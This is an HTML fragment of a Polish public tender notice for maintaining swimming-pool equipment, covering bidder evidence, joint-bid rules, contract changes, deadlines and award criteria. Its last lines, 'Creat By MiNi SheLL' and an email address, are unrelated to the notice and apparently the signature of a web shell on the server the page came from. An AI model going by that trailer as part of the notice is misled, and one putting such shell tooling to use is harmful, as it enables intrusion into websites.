oferty/oferty częściowej niezależnie od innego wykonawcy należącego do tej samej grupy kapitałowej<br/><br/>c) oświadczenie wykonawcy o aktualności informacji zawartych w oświadczeniu, o którym mowa w art. 125 ust. 1 ustawy Pzp, w zakresie podstaw wykluczenia z postępowania wskazanych przez zamawiającego w pkt 22 SWZ, o którym mowa w § 2 ust. 1 pkt 7 oraz § 3 rozporządzenia Ministra Rozwoju, Pracy i Technologii z dnia 23 grudnia 2020 r. w sprawie podmiotowych środków dowodowych oraz innych dokumentów lub oświadczeń, jakich może żądać zamawiający od wykonawcy (Dz. U. 2020.2415)</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">a) wykaz usług wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych - w okresie ostatnich 3 lat, a jeżeli okres prowadzenia działalności jest krótszy, to w tym okresie co najmniej jedną usługę, dotyczącą przeglądów okresowych i konserwacji urządzeń technologii basenowej, w tym m.in.:<br/><br/><br/>- urządzeń: EVOQUA/PROBIKO-AQUA, <br/>- niecek basenowych ze stali nierdzewnej wraz z wyposażeniem, instalacji hydraulicznej i zbiorników przelewowych, <br/>- urządzeń układu sterowania automatyką technologii basenowej i instalacji dozującej chemię basenową minimum jednej z producentów :ARUS/PROMINENT/GRUNDFOS/SACOPA, <br/>- instalacji ultrafiltracji Ultra Ecoswim i filtrów niskociśnieniowych TECHNOL, <br/><br/>, wraz z podaniem, przedmiotu, dat wykonania (okresu realizacji) i podmiotów, na rzecz których usługi te zostały wykonane lub są wykonywane, oraz załączeniem dowodów określających czy usługi zostały wykonane lub są wykonywane należycie.<br/> <br/>Dowodami w przypadku zamówień na usługi są: <br/>– referencje, <br/>– inne dokumenty sporządzone przez podmiot, na rzecz którego usługi zostały wykonane, a w przypadku świadczeń powtarzających się lub ciągłych są wykonywane, a jeżeli Wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów to oświadczenie Wykonawcy,<br/>Uwaga! W przypadku świadczeń powtarzających się lub ciągłych nadal wykonywanych referencje bądź inne dokumenty potwierdzające ich należyte wykonywanie powinny być wystawione w okresie ostatnich 3 miesięcy.<br/>*Za wykonaną usługę Zamawiający uzna taką usługę której przedmiot został odebrany przez Zamawiającego jako wykonany należycie.<br/><br/>b) wykaz osób skierowanych przez wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie pracami, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami:<br/><br/>zawierający co najmniej jedną osobę posiadającą ( lub osoby posiadające w sumie ) odpowiednie kwalifikacje do prawidłowego wykonania powierzonych im czynności tj. :<br/>– kwalifikacje potwierdzone aktualnym stosownym certyfikatem lub innym dokumentem wystawionym przez producenta lub autoryzowanego przedstawiciela producenta urządzeń stanowiących przedmiot świadczonych usług ),<br/>- uprawnienia SEP (E lub D), badania sanitarne oraz certyfikat f-gazowy <br/>- co najmniej 1 - roczne doświadczenie zawodowe w świadczeniu usług stanowiących przedmiot zamówienia- dotyczy każdej z osób <br/><br/>c) informacja banku lub spółdzielczej kasy oszczędnościowo-kredytowej, potwierdzająca wysokość <br/>posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawionej nie wcześniej niż 3 miesiące przed jej złożeniem: - w kwocie min. 150.000,00 zł <br/><br/> * W przypadku, gdy Wykonawca powołuje się przy wykazywaniu spełnienia warunków udziału w <br/> postępowaniu, o których mowa w art. 112 ust. 2 pkt 3 ustawy Pzp, na zasoby innych podmiotów należy <br/> złożyć informację z banku lub spółdzielczej kasy oszczędnościowo-kredytowej, wystawioną nie wcześniej niż 3 miesiące przed jej złożeniem, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową innego podmiotu : – w kwocie min. 150.000,00 zł<br/><br/>Jeżeli z uzasadnionej przyczyny wykonawca nie może złożyć wymaganych przez zamawiającego powyższych dokumentów, o których mowa powyżej w pkt 12.7 lit. d) SWZ, wykonawca składa inne dokumenty, które w wystarczający sposób potwierdzają spełnianie opisanego przez zamawiającego warunku udziału w postępowaniu, dotyczącego sytuacji ekonomicznej lub finansowej.</span> </h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> b) *Pełnomocnictwo do reprezentowania w postępowaniu o udzielenie zamówienia publicznego do złożenia oferty musi być złożone w oryginale w takiej samej formie jak składana oferta (tj. w formie elektronicznej lub w postaci elektronicznej, opatrzonej podpisem kwalifikowanym, podpisem zaufanym lub podpisem osobistym). Dopuszcza się także złożenie elektronicznej kopii (skanu) pełnomocnictwa sporządzonego uprzednio w formie pisemnej, w formie elektronicznego poświadczenia sporządzonego stosownie do art. 97 § 2 ustawy z dnia 14 lutego1991 r. – prawo o notariacie, które to poświadczenie notariusz opatruje kwalifikowanym podpisem elektronicznym bądź też poprzez opatrzenie skanu pełnomocnictwa sporządzonego uprzednio w formie pisemnej kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub podpisem osobistym mocodawcy. Elektroniczna kopia pełnomocnictwa nie może być uwierzytelniona przez upełnomocnionego. (*jeżeli dotyczy )<br/>Dokument ten będzie załącznikiem Nr 2 do oferty.<br/><br/>c) *Zobowiązanie podmiotów, na których zdolnościach technicznych, zawodowych, sytuacji finansowej lub <br/>ekonomicznej polega Wykonawca do oddania mu do dyspozycji niezbędnych zasobów na potrzeby realizacji <br/>zamówienia podpisane: kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub podpisem osobistym podmiotu udostępniającego zasoby. ( *jeżeli dotyczy )<br/>Dokument ten będzie załącznikiem Nr 3 do oferty. <br/><br/>d)*Oświadczenie, z którego wynika które usługi wykonają poszczególni Wykonawcy składający ofertę wspólnie, podpisane kwalifikowanym podpisem elektronicznym , podpisem zaufanym lub podpisem osobistym ( *jeżeli dotyczy )<br/>Dokument ten będzie załącznikiem Nr 4 do oferty. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia w rozumieniu art. 58 ust. 1 ustawy Pzp. Wykonawcy<br/>występujący wspólnie zobowiązani są dołączyć do oferty dokument (pismo, oświadczenie) wskazujący ustanowionego<br/>pełnomocnika do reprezentowania Wykonawcy w postępowaniu o<br/>udzielenie zamówienia publicznego albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia<br/>publicznego. Dokument ten musi być wystawiony zgodnie z wymogami ustawowymi, podpisany przez prawnie<br/>upoważnionych przedstawicieli wszystkich Wykonawców wspólnie ubiegających się o udzielenie zamówienia.<br/>2. Zgodnie z art. 445 ust.1 ustawy Pzp Wykonawcy wspólnie ubiegający się o udzielenie zamówienia ponoszą solidarną<br/>odpowiedzialność za wykonanie umowy i wniesienie zabezpieczenia należytego wykonania umowy.<br/>3. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, żaden z nich nie może podlegać<br/>wykluczeniu z powodu niespełniania warunków, o których mowa w pkt. 10.1a SWZ.<br/>4. Jeśli wykonawcy wspólnie ubiegają się o udzielenie niniejszego zamówienia to:<br/>a) warunek określony w pkt 10.1.4) lit. a. musi spełniać przynajmniej jeden z Wykonawców (Partnerów) składających ofertę<br/>wspólną,<br/>b) pozostałe warunki określone powyżej musi spełniać co najmniej jeden z Partnerów składających ofertę wspólną lub<br/>Partnerzy składający ofertę wspólną spełniają łącznie.<br/>5. W wypadku wspólnego ubiegania się o udzielenie zamówienia Wykonawcy mogą polegać na zdolnościach tych z<br/>Wykonawców, którzy wykonają roboty budowlane lub usługi, do których realizacji te zdolności są wymagane. W takim<br/>wypadku należy złożyć Zamawiającemu oświadczenie do oferty, z którego wynika które roboty budowlane lub usługi<br/>wykonają poszczególni Wykonawcy składający ofertę wspólnie.<br/>6. W przypadku wykonawców wspólnie realizujących zamówienie (w tym konsorcjum) Zamawiający dokonywać będzie<br/>bezpośrednich rozliczeń tylko z liderem konsorcjum. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zamawiający określa następujące warunki, w jakich przewiduje możliwość dokonania zmian zawartej <br/>umowy odnośnie wydłużenia terminu realizacji z pkt. 5.1 SWZ:<br/><br/>1. Z uwagi na masowe występowanie choroby zakaźnej ludzi (w szczególności koronawirus/COVID-19, etc.) mające bezpośredni lub pośredni wpływ na terminową realizację niniejszego zadania.<br/>2. Z powodu działania siły wyższej, np. wystąpienia zdarzenia losowego wywołanego przez czynniki <br/>zewnętrzne, którego nie można było przewidzieć, w szczególności zagrażającego bezpośrednio życiu lub <br/>zdrowiu ludzi lub grożącego powstaniem szkody w znacznych rozmiarach.<br/>3. Z przyczyn zależnych i niezależnych od Zamawiającego, których nie mógł przewidzieć w chwili zawarcia umowy.<br/>4. Spowodowaną względami formalnymi, związanymi z przedłużającą się procedurą wyboru Wykonawcy <br/>(ponad 30 dniowy termin związania ofertą). Termin realizacji umowy ulegnie wtedy przedłużeniu max. <br/>o okres wydłużonego ponad 30 dniowego terminu związania z ofertą.<br/><br/>Zamawiający dopuszcza zmiany postanowień zawartej umowy bez przeprowadzenia nowego postępowania o udzielenie zamówienia, o ile zachodzą okoliczności wymienione w art. 455 ust.1 i 2 ustawy Pzp.<br/>Zamawiający informuje, że wynagrodzenie Wykonawcy w przypadku zmiany mającej wpływ na koszty wykonania zamówienia przez Wykonawcę:<br/>- stawki podatku od towarów i usług oraz podatku akcyzowego,<br/>- wysokości minimalnego wynagrodzenia za pracę albo wysokości minimalnej stawki godzinowej, ustalonych na podstawie ustawy z dnia 10 października 2002 r. o minimalnym wynagrodzeniu za pracę, <br/>- zasad podlegania ubezpieczeniom społecznym lub ubezpieczeniu zdrowotnemu lub wysokości stawki składki na ubezpieczenia społeczne lub zdrowotne,<br/>- zasad gromadzenia i wysokości wpłat do pracowniczych planów kapitałowych, o których mowa w ustawie <br/>z dnia 4 października 2018 r. o pracowniczych planach kapitałowych (Dz. U. poz. 2215 oraz z 2019 r. poz.1074 i 1572) , <br/>- jeżeli zmiany te będą miały wpływ na koszty wykonania zamówienia przez wykonawcę.<br/>Zamawiający dopuszcza możliwość dokonania istotnych zmian postanowień zawartej Umowy w zakresie zmiany wysokości całkowitego wynagrodzenia brutto w przypadku zmiany ceny materiałów lub kosztów związanych z realizacją przedmiotu umowy, jeżeli zmiany te będą miały wpływ na koszty wykonania przedmiotu umowy przez Wykonawcę. <br/>W wypadku zmiany, o której mowa powyżej w stosunku do cen, obowiązujących w dniu podpisania umowy lub w dniu ostatniej waloryzacji, Zamawiający określa:<br/>- poziom zmiany ceny materiałów lub kosztów uprawniający Strony Umowy do żądania zmiany wynagrodzenia to zmiana wskaźnika cen towarów i usług konsumpcyjnych ogółem o min. 5 % ogłaszana w komunikacie Prezesa Głównego Urzędu Statystycznego w sprawie wskaźnika cen towarów i usług konsumpcyjnych ogółem w kwartale w stosunku do poprzedniego kwartału,<br/>- maksymalna wartość zmiany wynagrodzenia, jaką dopuszcza Zamawiający w efekcie zastosowania postanowień o zasadach wprowadzania zmian wysokości całkowitego wynagrodzenia brutto wynosi 20 %. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-12-05 11:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://miniportal.uzp.gov.pl/</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-12-05 12:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2023-01-03</span></h3> <h3 class="mb-0">8.5.) Zamawiający przewiduje wybór najkorzystniejszej oferty z możliwością negocjacji: <span class="normal">Tak</span></h3> <h3 class="mb-0">8.6.) Maksymalna liczba wykonawców, którzy zostaną zaproszeni do negocjacji: <span class="normal">3</span></h3> <h3 class="mb-0">8.7) Kryteria oceny ofert, które zamawiający zamierza stosować w celu ograniczenia liczby wykonawców: </h3> A) Cena – waga kryterium – 60 %<br/>B) Czas przystąpienia do interwencji w przypadku awarii – waga kryterium - 40%

Creat By MiNi SheLL
Email: jattceo@gmail.com